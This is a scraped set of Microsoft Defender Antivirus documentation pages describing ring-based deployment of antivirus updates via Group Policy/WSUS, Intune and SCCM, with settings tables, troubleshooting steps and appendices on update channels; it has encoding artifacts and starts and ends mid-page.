- > At a minimum, authenticated users must have "Read" access. This requirement also applies to domain computers, the share, and NTFS (security).
-
-7. Set the share location in the policy to the share.
-
- > [!NOTE]
- > Do not add the x64 (or x86) folder in the path. The mpcmdrun.exe process adds it automatically.
-
-## Setting up the Pilot (UAT/Test/QA) environment
-
-This section describes the process for setting up the pilot UAT / Test / QA environment, on about 10-500 Windows and/or Windows Server systems, depending on how many total systems that you all have.
-
-> [!NOTE]
-> If you have a Citrix environment, include at least 1 Citrix VM (non-persistent) and/or (persistent)
-
-In [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn265969(v=ws.11)) (GPMC, GPMC.msc), create or append to your Microsoft Defender Antivirus policy.
-
-1. Edit your Microsoft Defender Antivirus policy. For example, edit _MDAV\_Settings\_Pilot_. Go to **Computer Configuration** > **Policies** > **Administrative Templates** > **Windows Components** > **Microsoft Defender Antivirus**. There are three related options:
-
- |Feature|Recommendation for the pilot systems|
- |||
- |Select the channel for Microsoft Defender daily **Security Intelligence updates**|Current Channel (Staged)|
- |Select the channel for Microsoft Defender monthly **Engine updates**|Beta Channel|
- |Select the channel for Microsoft Defender monthly **Platform updates**|Beta Channel|
-
- The three options are shown in the following figure.
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-gp-microsoft-defender-antivirus-channels.png" alt-text="Screenshot that shows a screen capture of the pilot Computer Configuration > Policies > Administrative Templates > Windows Components > Microsoft Defender Antivirus update channels." lightbox="media/microsoft-defender-antivirus-deploy-ring-gp-microsoft-defender-antivirus-channels.png":::
-
- For more information, see [Manage the gradual rollout process for Microsoft Defender updates](manage-gradual-rollout.md)
-
-1. Go to **Computer Configuration** > **Policies** > **Administrative Templates** > **Windows Components** > **Microsoft Defender Antivirus**.
-
-1. For _intelligence_ updates, double-click **Select the channel for Microsoft Defender monthly intelligence updates**.
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-gp-microsoft-defender-antivirus-channel-staged.png" alt-text="Screenshot that shows a screen capture of the Select the channel for Microsoft Defender monthly intelligence updates page with Enabled and Current Channel (Staged) selected." lightbox="media/microsoft-defender-antivirus-deploy-ring-gp-microsoft-defender-antivirus-channel-staged.png":::
-
-1. On the **Select the channel for Microsoft Defender monthly intelligence updates** page, select **Enabled**, and in **Options**, select **Current Channel (Staged)**.
-
-1. Select **Apply**, and then select **OK**.
-
-1. Go to **Computer Configuration** > **Policies** > **Administrative Templates** > **Windows Components** > **Microsoft Defender Antivirus**.
-
-1. For _engine_ updates, double-click **Select the channel for Microsoft Defender monthly engine updates**.
-
-1. On the **Select the channel for Microsoft Defender monthly Platform updates** page, select **Enabled**, and in **Options**, select **Beta Channel**.
-
-1. Select **Apply**, and then select **OK**.
-
-1. For _platform_ updates, double-click **Select the channel for Microsoft Defender monthly Platform updates**.
-
-1. On the **Select the channel for Microsoft Defender monthly Platform updates** page, select **Enabled**, and in **Options**, select **Beta Channel**. These two settings are shown in the following figure:
-
-1. Select **Apply**, and then select **OK**.
-
-### Related articles
--- [Antivirus profiles - Devices managed by Microsoft Intune](/mem/intune/protect/endpoint-security-antivirus-policy#antivirus-profiles)-- [Use Endpoint security Antivirus policy to manage Microsoft Defender update behavior (Preview)](/mem/intune/fundamentals/whats-new#use-endpoint-security-antivirus-policy-to-manage-microsoft-defender-update-behavior-preview)-- [Manage the gradual rollout process for Microsoft Defender updates](manage-gradual-rollout.md)-
-## Setting up the production environment
-
-1. In [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn265969(v=ws.11)) (GPMC, GPMC.msc), go to **Computer Configuration** > **Policies** > **Administrative Templates** > **Windows Components** > **Microsoft Defender Antivirus**.
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-gp-microsoft-defender-antivirus-channels.png" alt-text="Screenshot that shows a screen capture of the production Computer Configuration > Policies > Administrative Templates > Windows Components > Microsoft Defender Antivirus update channels." lightbox="media/microsoft-defender-antivirus-deploy-ring-gp-microsoft-defender-antivirus-channels.png":::
-
-1. Set the three policies as follows:
-
- |Feature|Recommendation for the production systems|Remarks|
- |||
- |Select the channel for Microsoft Defender daily **Security Intelligence updates**|Current Channel (Broad)|This setting provides you with 3 hours of time to find an FP and prevent the production systems from getting an incompatible signature update.|
- |Select the channel for Microsoft Defender monthly **Engine updates**|Critical ΓÇô Time delay|Updates are delayed by two days.|
- |Select the channel for Microsoft Defender monthly **Platform updates**|Critical ΓÇô Time delay|Updates are delayed by two days.|
-
-1. For _intelligence_ updates, double-click **Select the channel for Microsoft Defender monthly intelligence updates**.
-
-1. On the **Select the channel for Microsoft Defender monthly intelligence updates** page, select **Enabled**, and in **Options**, select **Current Channel (Broad)**.
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-gp-microsoft-defender-antivirus-channel-staged.png" alt-text="Screenshot that shows a screen capture of the Select the channel for Microsoft Defender monthly intelligence updates page with Enabled and Current Channel (Staged) selected." lightbox="media/microsoft-defender-antivirus-deploy-ring-gp-microsoft-defender-antivirus-channel-staged.png":::
-
-1. Select **Apply**, and then select **OK**.
-
-1. For _engine_ updates, double-click **Select the channel for Microsoft Defender monthly engine updates**.
-
-1. On the **Select the channel for Microsoft Defender monthly Platform updates** page, select **Enabled**, and in **Options**, select **Critical ΓÇô Time delay**.
-
-1. Select **Apply**, and then select **OK**.
-
-1. For _platform_ updates, double-click **Select the channel for Microsoft Defender monthly Platform updates**.
-
-1. On the **Select the channel for Microsoft Defender monthly Platform updates** page, select **Enabled**, and in **Options**, select **Critical ΓÇô Time delay**.
-
-1. Select **Apply**, and then select **OK**.
-
-## If you encounter problems
-
-If you encounter problems with your deployment, create or append your Microsoft Defender Antivirus policy:
-
-1. In [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn265969(v=ws.11)) (GPMC, GPMC.msc), create or append to your Microsoft Defender Antivirus policy using the following setting:
-
- Go to **Computer Configuration** > **Policies** > **Administrative Templates** > **Windows Components** > **Microsoft Defender Antivirus** > (administrator-defined) _PolicySettingName_. For example, _MDAV\_Settings\_Production_, right-click, and then select **Edit**. **Edit** for **MDAV\_Settings\_Production** is shown in the following figure:
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-policy-edit.png" alt-text="Screenshot that shows a screen capture of the administrator-defined Microsoft Defender Antivirus policy Edit option." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-policy-edit.png":::
-
-1. Select **Define the order of sources for downloading security intelligence updates**.
-
-1. Select the radio button named **Enabled**.
-
-1. Under **Options:**, change the entry to _FileShares_, select **Apply**, and then select **OK**. This change is shown in the following figure:
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-policy-define-order.png" alt-text="Screenshot that shows a screen capture of the Define the order of sources for downloading security intelligence updates page." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-policy-define-order.png":::
-
-1. Select **Define the order of sources for downloading security intelligence updates**.
-
-1. Select the radio button named **Disabled**, select **Apply**, and then select **OK**. The disabled option is shown in the following figure:
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-policy-disabled.png" alt-text="Screenshot that shows a screen capture of the Define the order of sources for downloading security intelligence updates page with Security Intelligence updates disabled." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-policy-disabled.png":::
-
-1. The change is active when Group Policy updates. There are two methods to refresh Group Policy:
-
- - From the command line, run the Group Policy update command. For example, run `gpupdate / force`. For more information, see [gpupdate](/windows-server/administration/windows-commands/gpupdate)
- - Wait for Group Policy to automatically refresh. Group Policy refreshes every 90 minutes +/- 30 minutes.
-
- If you have multiple forests/domains, force replication or wait 10-15 minutes. Then force a Group Policy Update from the Group Policy Management Console.
-
- - Right-click on an organizational unit (OU) that contains the machines (for example, Desktops), select **Group Policy Update**. This UI command is the equivalent of doing a gpupdate.exe /force on every machine in that OU. The feature to force Group Policy to refresh is shown in the following figure:
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-management-console.png" alt-text="Screenshot that shows a screen capture of the Group Policy Management console, initiating a forced update." lightbox="media/microsoft-defender-antivirus-deploy-ring-group-policy-wsus-gp-management-console.png":::
-
-1. After the issue is resolved, set the **Signature Update Fallback Order** back to the original setting. `InternalDefinitionUpdateServder|MicrosoftUpdateServer|MMPC|FileShare`.
-
-## See also
-
-[Microsoft Defender Antivirus ring deployment overview](microsoft-defender-antivirus-ring-deployment.md)
security Microsoft Defender Antivirus Ring Deployment Group Policy Wsus Appendices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-ring-deployment-group-policy-wsus-appendices.md
- Title: Appendices for ring deployment using Group Policy and Windows Server Update Services (WSUS)
-description: Microsoft Defender for Endpoint is an enterprise endpoint security platform that helps defend against advanced persistent threats. This article provides supplemental information to the Microsoft Defender Antivirus Group Policy WSUS ring deployment guide.
------- m365-security-- tier1-- mde-ngp--- Previously updated : 07/21/2023--
-# Appendices for Microsoft Defender Antivirus ring deployment using Group Policy and Windows Server Update Services (WSUS)
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platforms**
--- Windows-- Windows Server-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats.
-
-> [!TIP]
-> Microsoft Defender for Endpoint is available in two plans, Defender for Endpoint Plan 1 and Plan 2. A new Microsoft Defender Vulnerability Management add-on is now available for Plan 2.
-
-## Appendix A - Security Intelligence Updates
-
-Microsoft continually updates security intelligence in antimalware products to cover the latest threats and to constantly tweak detection logic. The updates enhance the ability of Microsoft Defender Antivirus and other Microsoft antimalware solutions to accurately identify threats. This security intelligence works directly with cloud-based protection to deliver fast and powerful AI-enhanced, next-generation protection.
-
-### References:
--- [Security intelligence updates for Microsoft Defender Antivirus and other Microsoft antimalware](https://www.microsoft.com/en-us/wdsi/defenderupdates)--- [Description of Forefront endpoint security definition updates](https://support.microsoft.com/topic/description-of-forefront-endpoint-security-definition-updates-b0833c24-fab3-390b-820b-3835beeb03b3)-
-## Appendix B - Engine Updates
-
-Engine updates are the updates for the scan engine, which is used by the "Security Intelligence Updates". First released on July 15, 2010.
-
-## Appendix C - Platform Updates
-
-Platform Updates, are the .exe's, dll's, and .sys's for the Microsoft Defender Antivirus service.
-
-| Channel: | Version: | Revision: | &nbsp; | Remarks |
-|:|:|:|:|:|
-| **Beta Channel - Prerelease** | 4.18.2304.4 | '23 April, minor rev 4 | n/a | This channel is the one you want to test for app compatibility, reliability and performance. |
-| **Current Channel (Preview)** | 4.18.2303.8 | '23 Mar, minor rev 8 | n/a | Same as for _Beta Channel - Prerelease_ |
-| **Current Channel (Staged)** | 4.18.2303.7 | '23 Mar, minor rev 7 | n/a | Same as for _Beta Channel - Prerelease_ |
-| **Current Channel (Broad)** | 4.18.2302.7 <br> see note | '23 Feb, minor rev 7 | '23 Mar | This channel is the one you want to push out to 90%-100% of your production systems. |
-
-> [!NOTE]
-> Where **23** == _2023_, **02** == _February_, and **.7** is the _minor revision_.
-
-## See also
-
-[Microsoft Defender Antivirus pilot ring deployment using Group Policy and Windows Server Update Services](microsoft-defender-antivirus-pilot-ring-deployment-group-policy-wsus.md)
security Microsoft Defender Antivirus Ring Deployment Intune Microsoft Update https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-ring-deployment-intune-microsoft-update.md
- Title: Ring deployment using Intune and Microsoft Update (MU)
-description: Microsoft Defender Antivirus is an enterprise endpoint security platform that helps defend against advanced persistent threats. This article provides information about how to use a ring deployment method to update your Microsoft Defender Antivirus clients using Intune and Microsoft Update (MU).
------- m365-security-- tier1-- mde-ngp--- Previously updated : 07/21/2023--
-# Microsoft Defender Antivirus ring deployment using Intune and direct internet access for Microsoft Update
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platforms**
--- Windows-- Windows Server-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats.
-
-> [!TIP]
-> Microsoft Defender for Endpoint is available in two plans, Defender for Endpoint Plan 1 and Plan 2. A new Microsoft Defender Vulnerability Management add-on is now available for Plan 2.
-
-## Setting up the pilot environment
-
-This section describes the process for setting up the pilot UAT / Test / QA environment.
--
-On about 10-500* Windows and/or Windows Server systems, depending on how many total systems that you all have:
-
-In the Intune portal [https://endpoint.microsoft.com](https://endpoint.microsoft.com), create or append to your Microsoft Defender Antivirus policy the following setting:
-For example, your pilot policy named _MDAV_Settings_Pilot_. If you have a Citrix environment, include at least one Citrix VM (non-persistent and/or persistent).
--
-> [!NOTE]
-> Security intelligence update (SIU) is equivalent to signature updates, which is the same as definition updates.
-
-Recommended settings are as follows:
-
-|Feature | Recommendation |
-|: |: |
-| Engine Updates Channel | Beta Channel |
-| Platform Updates Channel | Beta Channel |
-| Security Intelligence Updates Channel | Current Channel (Staged) |
-
-### References
--- [Antivirus profiles - Devices managed by Microsoft Intune](/mem/intune/protect/endpoint-security-antivirus-policy#antivirus-profiles)-- [Use Endpoint security Antivirus policy to manage Microsoft Defender update behavior](/mem/intune/fundamentals/whats-new#use-endpoint-security-antivirus-policy-to-manage-microsoft-defender-update-behavior-preview)--
-## Setting up the Production environment
-
-In the Intune portal [https://endpoint.microsoft.com](https://endpoint.microsoft.com), create or append to your Microsoft Defender Antivirus policy using the following setting:
-For example, your production policy named _MDAV_Settings_Production_.
--
-|Feature | Recommendation | Comments |
-|: |: |: |
-| Engine Updates Channel | Critical ΓÇô Time delay | It's delayed by two days.|
-| Platform Updates Channel | Critical ΓÇô Time delay | It's delayed by two days.|
-| Security Intelligence Updates Channel | Current Channel (Broad) | This configuration provides you with 3 hours of time to find an FP and prevent the production systems from getting an incompatible signature update. |
-
-### If you encounter problems
-
-If you encounter problems with your deployment, change the source of the Microsoft Defender Antivirus updates:
-
-1. In the Intune portal [https://endpoint.microsoft.com](https://endpoint.microsoft.com), go to **Endpoint Security**, select **Antivirus**, and then find your Intune production policy (for example, MDAV_Settings_Production), and then, in **Configuration settings**, select **Edit**.
-
-1. Change the entry to **FileShares**. This change is shown in the following figure.
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-intune-microsoft-defender-antivirus-production-policy-fallback.png" alt-text="Shows Intune Microsoft Defender Antivirus production policy fallback setting." lightbox="media/microsoft-defender-antivirus-deploy-ring-intune-microsoft-defender-antivirus-production-policy-fallback.png":::
-
-#### What this change does
-
-It forces Microsoft Defender Antivirus to look for the **Security Intelligence Update**, **Engine Update** or **Platform Update** from a file share that doesn't exist.
-
-#### How long does it take for the Intune policy to refresh?
-
-If you update a policy, it's within a few minutes (3-5 minutes) via WNS, as long the WNS URLs' are open.
-
-Reference: [Intune actions that immediately send a notification to a device](/mem/intune/configuration/device-profile-troubleshoot#intune-actions-that-immediately-send-a-notification-to-a-device)
-
-After the issue is resolved, set the "Signature Update Fallback Order" back to the original setting"
-
-`InternalDefinitionUpdateServder|MicrosoftUpdateServer|MMPC|FileShare`
-
-## See also
-
-[Microsoft Defender Antivirus ring deployment](microsoft-defender-antivirus-ring-deployment.md)
security Microsoft Defender Antivirus Ring Deployment Sscm Wsus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-ring-deployment-sscm-wsus.md
- Title: Ring deployment using System Center Configuration Manager and Windows Server Update Services
-description: Microsoft Defender Antivirus is an enterprise endpoint security platform that helps defend against advanced persistent threats. This article provides information about how to use a ring deployment method to update your Microsoft Defender Antivirus clients using System Center Configuration Manager (SCCM) and Windows Server Update Services (WSUS).
------- m365-security-- tier1-- mde-ngp--- Previously updated : 07/21/2023--
-# Microsoft Defender Antivirus ring deployment using System Center Configuration Manager and Windows Server Update Services
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platforms**
--- Windows-- Windows Server-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats.
-
-> [!TIP]
-> Microsoft Defender for Endpoint is available in two plans, Defender for Endpoint Plan 1 and Plan 2. A new Microsoft Defender Vulnerability Management add-on is now available for Plan 2.
-
-## Setting up the pilot environment
-
-This section describes the process for setting up the pilot UAT / Test / QA environment.
--
-> [!NOTE]
-> Security intelligence update (SIU) is equivalent to signature updates, which is the same as definition updates.
-
-On about 10-500 Windows and/or Windows Server systems, depending on how many total systems that you all have.
-
-> [!NOTE]
-> If you have a Citrix environment, include at least 1 Citrix VM (non-persistent) and/or (persistent)
-
-1. In **System Center Configuration Manager** > **Create Automatic Deployment Rule Wizard** > **General** page, in **Specify the setting for this automatic deployment rule**, make the following settings:
-
- | In: | Change: |
- |:|:|
- | **Name** | Type a name for your deployment rule. For example, type _MDE-MDAV_Security_Intelligence_Update_Pilot_ |
- | **Description** | Type a brief description for your pilot |
- | **Template** | Select **SCEP and Windows Defender Antivirus Updates** |
- | **Collection** | Type **Windows_Security_Intelligence_Pilot** |
- | **Each time the rule runs and finds new updates**. | Select **Create a new Software Update Group** |
- | **Each time the rule runs and finds new updates** | Select **Enable the deployment after this rule is run** |
-
-1. Select **Next**. On the **Deployment Settings** page, under **Specify the settings for this Automatic Deployment Rule**, then do the following:
-
- | In: | Change: |
- |:|:|
- | **Type of deployment** | Select **Required** |
- | **Detail level** | Select **Only error messages** |
- | **Some software updates include a license agreement** | Select **Automatically deploy all software updates found by this rule, and approve any license agreements**. |
-
-1. Select **Next**. On the **Software Updates** page, under **Select the property filters and search criteria**, make the following settings:
-
- | In: | Change: |
- |:|:|
- | **Property filters** | Select **Article ID** and **Date Released or Revised** |
- | **Search Criteria** | Enter the following <br> **Article ID** = **2267602** <br> **Date Released or Revised** = **Last 1 month** <br> **Product** = **Windows Defender** <br> **Superseded** = **No** <br> **Update Classification** = **"Critical Updates" OR "Definition Updates"** |
-
- These settings are shown in the following image:
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-sccm-wizard-software-updates.png" alt-text="Shows recommended Intune Microsoft Defender Antivirus pilot policy settings for the Software Updates page." lightbox="media/microsoft-defender-antivirus-deploy-ring-sccm-wizard-software-updates.png":::
-
- > [!TIP]
- > Click **Preview** - to make sure "Security Intelligence Update for Windows Defender Antivirus" is listed. You should see **KB2267602**.
-
- > [!NOTE]
- > **Date Released or Revised: Last 1 month** - If your WSUS/SUP have been healthy, you may want to set this to "Last 1 week".
- >
- > **Product: "Windows Defender"** - We are removing "System Center Endpoint Protection", because we want to target this to only the operating systems that have Microsoft Defender Antivirus.
- >
- > **Update Classification**: "Critical Updates" and "Definition Updates"
-
-1. Select **Next**. On the **Evaluation Schedule** page, under **Specify the recurring schedule for this rule**, select **Run the rule on a schedule**, and then select **Customize**.
-
-1. On the **Deployment Schedule** page, under **Configure schedule details for this deployment**, do the following:
-
- | In: | Change: |
- |:|:|
- | **Schedule evaluation** > **Time based on** | Select **UTC** |
- | **Software available time** | Select **As soon as possible** |
- | **Installation deadline** | Select **As soon as possible** |
-
-1. Select **Next**. On the **User Experience** page, under **Specify the user experience for this deployment**, ensure the following are selected:
-
- | In: | Change: |
- |:|:|
- | **User visual experience** > **User notifications** | Select **Hide in Software center and all notifications** |
- | **Deadline behavior** | Select **Software Update Installation** |
- | **Device restart behavior** | Select **Servers** |
- | **Write filter handling for Windows Embedded devices** | Select **Commit changes at deadline or during a maintenance windows (requires restarts)** |
-
-1. Select **Next**. On the **Alerts** page, under **Specify software update alert options for this deployment**, select **Generate an alert when this Rule fails**, and then select **Next**.
-
-1. On the top-level **Deployment Package** page, under **Select deployment package for this automatic deployment rule**, select **Create a new deployment package**, and then do the following:
-
- | In: | Change: |
- |:|:|
- | **Name** | Type a name for your new deployment package. For example, type _MDE-MDAV Security Intelligence Update_. |
- | **Description** | Type a brief description for your new deployment package |
- | **Package Source (Example): \\_server_name_\_folder path_** | Type the path to your package source. For example, type _\\sccm\deployment\MDE-MDAV_Security_Intelligence_Updates_Pilot_ <br> or select **Browse** to navigate to - and select - your package source. |
- | **Sending priority:** | Select **High** and select **Enable binary differential replication** |
-
-1. Select **Next**. On the **Distribution point** page, under **Specify the distribution points or distribution point groups to host the content**, select **Add** and then specify your distribution point or distribution point groups.
-
-1. Select **Next**. On the **Distribution location** page, under **Specify download location for this Automatic Deployment Rule**, select **Download software updates from the Internet**, and then select **Next**.
-
-1. On the **Distribution location** page, under **Specify the update languages for product**, under **product**, select **Windows Update**.
-
-1. Select **Next**. On the **Download Settings** page, under **Specify the software updates download behavior for clients on slow site boundaries**, select the following:
-
- | In: | Change: |
- |:|:|
- | **Name** | In **Deployment options** select **Download software updates from distribution point and install** |
- | **Deployment options** | Select **Download and install software updates from the distribution points in site default boundary group** |
- | **Deployment options** | Select **"Prefer cloud based sources over on-premises sources" is configures in the boundary group settings, Microsoft update will be the preferred source.** |
-
-1. Select **Next**. On the **Summary** page, under **Confirm the settings**, review the settings. Example settings are shown in the following figure.
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-sccm-wizard-confirm-settings.png" alt-text="Shows the configuration details for the newly configured Automatic Deployment Rule." lightbox="media/microsoft-defender-antivirus-deploy-ring-sccm-wizard-confirm-settings.png":::
-
-1. Select **Next**. Wait until the process completes and the **Completion** page opens. Select **Close** to finish the process. Automatic Deployment rules are saved, and can be managed from the location shown in the following figure:
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-sccm-manage-pilot-policys.png" alt-text="Shows the Configuration Manager Software library and configured Automatic Deployment Rules." lightbox="media/microsoft-defender-antivirus-deploy-ring-sccm-manage-pilot-policys.png":::
-
-## Setting up the production environment
-
-1. In the System Center Configuration Manager > **Create Automatic Deployment Rule Wizard** > **General** page, in **Specify the setting for this automatic deployment rule**, make the following settings:
-
- | In: | Change: |
- |:|:|
- | **Name** | Type a name for your deployment rule. For example, type _MDE-MDAV_Security_Intelligence_Update_Production_ |
- | **Description** | Type a brief description for your pilot |
- | **Template** | Select **SCEP and Windows Defender Antivirus Updates** |
- | **Collection** | Type **Windows_Security_Intelligence_Production** |
- | **Each time the rule runs and finds new updates**. | Select **Add to an existing Software Update Group** |
- | **Each time the rule runs and finds new updates** | Select **Enable the deployment after this rule is run** |
-
-1. Select **Next**. On the **Deployment Settings** page, under **Specify the settings for this Automatic Deployment Rule**, then do the following:
-
- | In: | Change: |
- |:|:|
- | **Type of deployment** | Select **Required** |
- | **Detail level** | Select **Only error messages** |
- | **Some software updates include a license agreement** | Select **Automatically deploy all software updates found by this rule, and approve any license agreements**. |
-
-1. Select **Next**. On the **Software Updates** page, under **Select the property filters and search criteria**, enter the following:
-
- | In: | Change: |
- |:|:|
- | **Property filters** | Select **Product** and **Update Classification** |
- | **Search Criteria** | Enter the following product and update classifications: <br> **Article ID** = _2267602_ <br> **Date Released or Revised** = _Last 1 month_ <br> **Product** = _Windows Defender_ <br> **Superseded** = _No_ <br> **Update Classification** = _Critical Updates_ OR _Definition Updates_ |
-
- > [!TIP]
- > Click **Preview** - to make sure "Security Intelligence Update for Windows Defender Antivirus" is listed. You should see **KB2267602**.
-
- > [!NOTE]
- > **Date Released or Revised: Last 1 month** - If your WSUS/SUP have been healthy, you may want to set this to **Last 1 week**.
- >
- > **Product: "Windows Defender"** - We are removing "System Center Endpoint Protection", because we want to target this to only the operating systems that have Microsoft Defender Antivirus.
- >
- > **Update Classification**: "Critical Updates" and "Definition Updates"
-
-1. Select **Next**. On the **Evaluation Schedule** page, under **Specify the recurring schedule for this rule**, select **Run the rule on a schedule**, and then select **Customize**.
-
-1. On the **Deployment Schedule** page, under **Configure schedule details for this deployment, do the following:
-
- | In: | Change: |
- |:|:|
- | **Schedule evaluation** > **Time based on** | Select **UTC** |
- | **Software available time** | Select **As soon as possible** |
- | **Installation deadline** | Select **As soon as possible** |
-
-1. Select **Next**. On the **User Experience** page, under **Specify the user experience for this deployment**, ensure the following are selected:
-
- | In: | Change: |
- |:|:|
- | **User visual experience** > **User notifications** | Select **Hide in Software center and all notifications** |
- | **Deadline behavior** | Select **Software Update Installation** |
- | **Device restart behavior** | Select **Servers** |
- | **Write filter handling for Windows Embedded devices** | Select **Commit changes at deadline or during a maintenance windows (requires restarts)** |
-
-1. Select **Next**. On the **Alerts** page, under **Specify software update alert options for this deployment**, select **Generate an alert when this Rule fails**, select **Browse**, navigate to, and select the deployment package and then select **Next**.
-
-1. On the top-level **Deployment Package** page, under **Select deployment package for this automatic deployment rule**, select **Select a deployment package**.
-
-1. On the **Download Location page**, under **Specify download location for this Automatic Deployment Rule**, select **Download software updates from the Internet**, and then select **Next**.
-
-1. On the **Language Selection** page, under **Specify the update languages for product**, under **Product**, specify the necessary Product and Update languages.
-
-1. Select **Next**. On the **Download Settings** page, under **Specify the software updates download behavior for clients on slow site boundaries**, select the following:
-
- | In: | Change: |
- |:|:|
- | **Deployment options** | Select **Download and install software updates from the distribution points and install** |
- | **Deployment options** | Select **Download and install software updates from the distribution points site default boundary group** |
- | **Deployment options** | Select **"Prefer cloud based sources over on-premises sources" is configures in the boundary group settings, Microsoft update will be the preferred source.** |
-
-1. Select **Next**. On the **Summary** page, under **Confirm the settings**, review the settings. Example settings are shown in the following figure:
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-sccm-wizard-confirm-production-settings.png" alt-text="Shows as screen capture of the configuration details for the newly configured Automatic Deployment Rule for a production environment." lightbox="media/microsoft-defender-antivirus-deploy-ring-sccm-wizard-confirm-production-settings.png":::
-
-1. Select **Next**. Wait until the process completes and the **Completion** page opens. Select **Close** to finish the process.
-
-### If you encounter problems
-
-1. Navigate to **Software Library**
-1. Under **Software Updates**, select on **Automatic Deployment Rules**, right-click on **MDE-MDAV_Security_Intelligence_Update_Production**, and then select **Disable**. This setting is shown in the following figure:
-
- :::image type="content" source="media/microsoft-defender-antivirus-deploy-ring-sccm-disable-automatic-deployment-rules.png" alt-text="hows as screen capture of how to disable Automatic Deployment Rules if you encounter errors or problems." lightbox="media/microsoft-defender-antivirus-deploy-ring-sccm-disable-automatic-deployment-rules.png":::
-
-## See also
-
-[Microsoft Defender for Endpoint ring deployment](microsoft-defender-antivirus-ring-deployment.md)
security Microsoft Defender Antivirus Ring Deployment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-ring-deployment.md
- Title: Microsoft Defender Antivirus ring deployment guide overview
-description: Microsoft Defender Antivirus is an enterprise endpoint security platform that helps defend against advanced persistent threats. This article provides an overview about how to use ring deployment methods to update your Microsoft Defender Antivirus clients.
------- m365-security-- tier1-- mde-ngp--- Previously updated : 07/21/2023--
-# Deploy Microsoft Defender Antivirus in rings
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platforms**
--- Windows-- Windows Server-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats.
-
-> [!TIP]
-> Microsoft Defender for Endpoint is available in two plans, Defender for Endpoint Plan 1 and Plan 2. A new Microsoft Defender Vulnerability Management add-on is now available for Plan 2.
-
-Deploying Microsoft Defender for Endpoint can be done using a ring-based deployment approach and updating using the gradual rollout process.
-
-## Ring deployment overview
-
-It's important to ensure that client components are up to date to deliver critical protection capabilities and prevent attacks.
-Capabilities are provided through several components:
--- [Endpoint Detection & Response](overview-endpoint-detection-response.md)-- [Next-generation protection](microsoft-defender-antivirus-windows.md) with [cloud-delivered protection](cloud-protection-microsoft-defender-antivirus.md)-- [Attack Surface Reduction](overview-attack-surface-reduction.md)-
-Updates are released monthly using a gradual release process. This process helps to enable early failure detection to identify problematic results in your unique environment as it occurs and address it quickly before a larger rollout.
-
-> [!NOTE]
